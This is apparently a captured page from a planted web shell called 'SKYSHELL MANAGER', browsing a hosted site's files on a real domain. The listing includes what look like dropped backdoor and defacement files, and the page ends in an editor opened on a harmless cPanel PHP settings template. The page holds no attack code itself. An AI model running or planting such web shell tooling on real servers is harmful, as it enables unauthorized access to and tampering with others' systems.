📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: basicMode.html.tt
[% SET on_switch_text = "ON" off_switch_text = "OFF" -%] [% IF (locale.get_language_tag() != "en"); # These characters should not be translated. on_switch_text = "I"; off_switch_text = "O"; END; -%] <!-- TABLE SECTION --> <div id="basicModeContainer" class="list-container"> <form name="basicModeForm" class="layout-medium" novalidate> <div class="row"> <div class="col-xs-12" ng-cloak> <cp-alert-list></cp-alert-list> </div> </div> <div class="row"> <div class="col-xs-12"> <h3 class="section-header">[% locale.maketext("Configure [asis,PHP INI] basic settings[comment,action header]") %]</h3> <span class="info-block" id="infoBlk"> <span> [% locale.maketext("Select the home directory or a domain’s document root to open the corresponding [asis,PHP] configuration.") %] </span> </span> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-6"> <div class="form-group"> <select id="selectLocation" class="form-control phpSelect" ng-disabled="noIniPaths" ng-options="path.name for path in iniPathNames" ng-model="selectedIniPath" ng-change="loadDirectives()"> <option id="selectOption" value=""> {{ txtInFirstOption }} </option> </select> <span spinner id="loadingSpinner" class="addSpinner" title="[% locale.maketext('Loading …') %]"></span> </div> </div> </div> <div class="row well well-sm iniInfoBlock" ng-show="selectedIniPath.type"> <div id="pathInfo" class="col-sm-12 col-md-5"> <span class="iniInfoTitle">[% locale.maketext("Path") %]</span> <span dir="ltr">{{currentIniPathInfo.inifullpath}}</span> </div> <div id="versionInfo" class="col-sm-12 col-md-3"> <span class="iniInfoTitle">[% locale.maketext("[asis,PHP] Version") %]</span> <span dir="ltr">{{currentIniPathInfo.versionLabel}}</span> </div> <div id="domainInfo" class="col-sm-12 col-md-4" ng-show="selectedIniPath.type === 'vhost'"> <span class="iniInfoTitle">[% locale.maketext("Domain") %]</span> <span dir="ltr">{{currentIniPathInfo.vhost}}</span> </div> </div> <div class="row"> <div class="col-xs-12"> <table id="directivesTable" class="table table-striped responsive-table"> <thead> <tr> <th> [% locale.maketext("[asis,PHP] Directive") %] </th> <th> [% locale.maketext("Information") %] </th> <th> [% locale.maketext("Setting") %] </th> </tr> </thead> <tbody ng-class="{ processing: loadingDirectiveList }"> <tr id="directiveRow{{$index}}" ng-repeat="directive in directiveList"> <td data-title="[% locale.maketext("[asis,PHP] Directive") %]" dir="ltr" ng-class="{ 'text-right': localeIsRTL }"> {{ directive.key }} </td> <td dir="ltr" data-title="[% locale.maketext("Information") %]" class="infoSpace"> {{ directive.info }} </td> <td data-title="[% locale.maketext("Setting") %]"> <div ng-show="directive.type === 'boolean'"> <toggle-switch id="switch_{{directive.key}}" ng-model="directive.toggleValue" on-toggle="toggle_status(directive)" enabled-label ="[% locale.maketext('Enabled') %]" disabled-label="[% locale.maketext('Disabled') %]"> </toggle-switch> </div> <div class="row" ng-show="directive.type !== 'boolean'"> <div class="col-xs-12"> <input type="text" name="txt{{directive.key}}" id="txt{{directive.key}}" class="form-control valueBox" ng-class="{ 'text-right': localeIsRTL }" ng-model="directive.value" dir="ltr" ng-required="requiredValidation(directive)" ng-change="directiveTextChange(directive)"> <span id="{{directive.key}}_default" dir="ltr" class="help-block defaultBlock" ng-class="{ 'text-right': localeIsRTL }" ng-bind-html="directive.defaultText"> </span> </div> <div class="col-xs-12"> <ul id="val_{{directive.key}}" validation-container field-name="txt{{directive.key}}"> <validation-item field-name="txt{{directive.key}}" validation-name="required"> [% locale.maketext("Required") %] </validation-item> <validation-item field-name="txt{{directive.key}}" validation-name="pattern"> <span id="{{directive.key}}_valMsg" ng-bind-html="directive.validationMsg"> </span> </validation-item> </ul> </div> </div> </td> </tr> <tr id="phpNotSelected" ng-hide="selectedIniPath.type" class="info empty-row"> <td colspan="3">[% locale.maketext("You must select a location.") %]</td> </tr> <tr id="listEmpty" ng-show="showEmptyMessage" class="info empty-row"> <td colspan="3">[% locale.maketext("There are no directives found for the current [asis,PHP] selection.") %]</td> </tr> </tbody> </table> </div> </div> <div class="form-group"> <button id="btnApply" type="button" class="btn btn-primary" ng-disabled="disableApply()" title="[% locale.maketext('Apply changed settings.') %]" cp-action="applyPhpSettings()"> [% locale.maketext('Apply') %] </button> </div> </form> </div>
Save